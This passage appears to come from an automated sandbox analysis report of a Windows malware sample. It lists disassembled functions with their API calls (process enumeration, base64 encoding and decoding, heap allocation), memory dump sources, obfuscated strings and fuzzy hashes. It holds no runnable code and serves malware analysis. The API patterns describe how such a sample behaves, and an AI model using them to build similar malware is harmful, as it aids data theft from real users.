                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #@7k$5=q$fZ?>$ydi{
                                    • API String ID: 0-2756908566
                                    • Opcode ID: 55e52ecbcf14d8ad390d672183024e042a0883e219f9adb32a503a5f34ce185c
                                    • Instruction ID: 4f6e0c5c18055fa1b04483d17c3c0e2401abe9ed4e3f2afbed339d4338b246f6
                                    • Opcode Fuzzy Hash: 55e52ecbcf14d8ad390d672183024e042a0883e219f9adb32a503a5f34ce185c
                                    • Instruction Fuzzy Hash: 63B239F3A0C2049FE304AE29EC8567AFBE9EB94720F1A493DE6C4C7744E53598058797
                                    Function 00C7D846 Relevance: 6.6, Strings: 4, Instructions: 1601COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .I}$1G?:$MI3o$[`_
                                    • API String ID: 0-1823041945
                                    • Opcode ID: a6f5c6d2c59704f69f7f0c7c9473b719271de87386c2f0fe6fc6829bedc1efd0
                                    • Instruction ID: 0f4a9d5333c3fe030695733cf3c494b2c19820ac1efec85172aee98069edc7e8
                                    • Opcode Fuzzy Hash: a6f5c6d2c59704f69f7f0c7c9473b719271de87386c2f0fe6fc6829bedc1efd0
                                    • Instruction Fuzzy Hash: 86B219F360C2049FD3046E2DEC8567AFBEAEF94720F1A493DE6C5C3744EA3598058696
                                    Function 008E39F0 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E3A36
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E3A49
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E3A5F
                                      • Part of subcall function 008E7340: lstrlen.KERNEL32(------,008C5B1B), ref: 008E734B
                                      • Part of subcall function 008E7340: lstrcpy.KERNEL32(00000000), ref: 008E736F
                                      • Part of subcall function 008E7340: lstrcat.KERNEL32(?,------), ref: 008E7379
                                      • Part of subcall function 008E72B0: lstrcpy.KERNEL32(00000000), ref: 008E72DE
                                    • CloseHandle.KERNEL32(00000000), ref: 008E3B97
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 645ef6f5e8e013109a54961f38f1f31825a50a4ef708f7c1a847602f3a7887b9
                                    • Instruction ID: 171a258ae9e2fbc3ea3d0464e0475741db21cf0982f5392be13d9eee2d2e70d7
                                    • Opcode Fuzzy Hash: 645ef6f5e8e013109a54961f38f1f31825a50a4ef708f7c1a847602f3a7887b9
                                    • Instruction Fuzzy Hash: B1810430904254CFC765CF5AD84CBA6B7B1FB85329F29C1A9D4099B3A2D7769D82CB40
                                    Function 008CED90 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 008CEDD6
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 008CEDDE
                                    • lstrcat.KERNEL32(008ED014,008ED014), ref: 008CEE87
                                    • lstrcat.KERNEL32(008ED014,008ED014), ref: 008CEEA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 8f755c9ff4c0fa90289ae01aa7ba7a074cebee0ce6970ae9fff9ba726e64b0a6
                                    • Instruction ID: a527a5bf26288be1c9bd211ae5bea5474c6d0deceb38592b22465c0b68aa3077
                                    • Opcode Fuzzy Hash: 8f755c9ff4c0fa90289ae01aa7ba7a074cebee0ce6970ae9fff9ba726e64b0a6
                                    • Instruction Fuzzy Hash: 6A31A475A00219ABDB10CBD8EC45FEEB779EF45715F044169FA08E2240DBB49A09CBA2
                                    Function 008E4090 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 008E40AD
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 008E40BC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E40C3
                                    • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 008E40F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptHeapString$AllocateProcess
                                    • String ID:
                                    • API String ID: 3825993179-0
                                    • Opcode ID: 4d738de28fdbb3c8a5e9e8ecda0365d9927d7730ce7eada58fc0f748b605d499
                                    • Instruction ID: 999755f3d6619041d0bde7437c6fa7fa2857db75cfb74a176b0eb7f0ebf39847
                                    • Opcode Fuzzy Hash: 4d738de28fdbb3c8a5e9e8ecda0365d9927d7730ce7eada58fc0f748b605d499
                                    • Instruction Fuzzy Hash: 5E012C70600209BBDB10DFE5EC89BABBBADEF85311F108069FE09C7240DA71D941CB60
                                    Function 008E2B00 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,008EA400,000000FF), ref: 008E2B2F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2B36
                                    • GetLocalTime.KERNEL32(?), ref: 008E2B42
                                    • wsprintfA.USER32 ref: 008E2B6E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                                    • String ID:
                                    • API String ID: 377395780-0
                                    • Opcode ID: 9d4a4817e68029138ab7112e751494f2180cdf71503f44374351b36fb4869649
                                    • Instruction ID: c501ee75ea5e21cbdb89db2e099a5a834fe77a9ead7d8adc0db722aa9dceada3
                                    • Opcode Fuzzy Hash: 9d4a4817e68029138ab7112e751494f2180cdf71503f44374351b36fb4869649
                                    • Instruction Fuzzy Hash: 910129B2904528ABCB14DBCADD49FBBB7BCFB4CA11F00021AF605A2280E6785941C7B5
                                    Function 008C9B80 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008C9B9B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008C9BAA
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008C9BC1
                                    • LocalFree.KERNEL32 ref: 008C9BD0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptLocalString$AllocFree
                                    • String ID:
                                    • API String ID: 4291131564-0
                                    • Opcode ID: e4fc5451e6c71dc46adef845112dab63c7e7520ddd0be29191ccd08e2cc26053
                                    • Instruction ID: 3c9f84c346c7b986a88ed2aabd87a65473e7c25c1b259c0ba592c0081d34a034
                                    • Opcode Fuzzy Hash: e4fc5451e6c71dc46adef845112dab63c7e7520ddd0be29191ccd08e2cc26053
                                    • Instruction Fuzzy Hash: 3DF0A9712443227BE7705BA5AC49F677BACEB04B61F240454FA49EA2C4DBB4DC41CAA4
                                    Function 00C7508D Relevance: 5.4, Strings: 3, Instructions: 1640COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: b o$cyw]$vK;
                                    • API String ID: 0-954764208
                                    • Opcode ID: ff051c11575b8a001573edea15f5d56d75d5ea4418927d136373d729b07d99ba
                                    • Instruction ID: 125c7663934560029bea43b10c8d78b0a7a0a4393c656cf5bc8afe3fc712be95
                                    • Opcode Fuzzy Hash: ff051c11575b8a001573edea15f5d56d75d5ea4418927d136373d729b07d99ba
                                    • Instruction Fuzzy Hash: 88B216F360C2049FD308AE2DEC8577ABBE5EF94720F1A893DE6C583744EA3558058697
                                    Function 00C735F9 Relevance: 5.4, Strings: 3, Instructions: 1622COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ATy7$LT{$_q Z
                                    • API String ID: 0-2510822072
                                    • Opcode ID: 9f1ff6e74acebee49c0e116584c691de1cf9d7fe462e9d98efacaf07cea8a960
                                    • Instruction ID: b4b6c00ef0cac27f50aaab90ab72a892fe41109711dd6c1149a3e5f9ac2dad2f
                                    • Opcode Fuzzy Hash: 9f1ff6e74acebee49c0e116584c691de1cf9d7fe462e9d98efacaf07cea8a960
                                    • Instruction Fuzzy Hash: B2B2F8F3A0C2009FE314AE2DEC8577ABBE9EF94720F16453DEAC5C7744E93598018696
                                    Function 00C8160B Relevance: 4.7, Strings: 3, Instructions: 969COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: bRW$f}kq$~So
                                    • API String ID: 0-1783350195
                                    • Opcode ID: bfa3d157dfe1f0bc3a51ac61c7d79a93f49d07e2038d4bbe4c8a7d937386373c
                                    • Instruction ID: 9328be435ea10d71d8b3afb4ff362304df15afbf772cfb699f20896a7c223dfc
                                    • Opcode Fuzzy Hash: bfa3d157dfe1f0bc3a51ac61c7d79a93f49d07e2038d4bbe4c8a7d937386373c
                                    • Instruction Fuzzy Hash: C86206F3A082049FE3046F2DEC8567AFBE9EF94720F1A892DE6C4C3744E63558458697
                                    Function 008DCBE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CoCreateInstance.COMBASE(008EB140,00000000,00000001,008EB130,?), ref: 008DCC06
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008DCC46
                                    • lstrcpyn.KERNEL32(?,?,00000104), ref: 008DCCC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                    • String ID:
                                    • API String ID: 1940255200-0
                                    • Opcode ID: fc630a8c373d87a21732cf555621dab6b95541dcf56c39ddee0bf58b2dc467b0
                                    • Instruction ID: 2ad14efad9209001629cfd453b2e42c54bbe363615bace0d08fce191e827ca85
                                    • Opcode Fuzzy Hash: fc630a8c373d87a21732cf555621dab6b95541dcf56c39ddee0bf58b2dc467b0
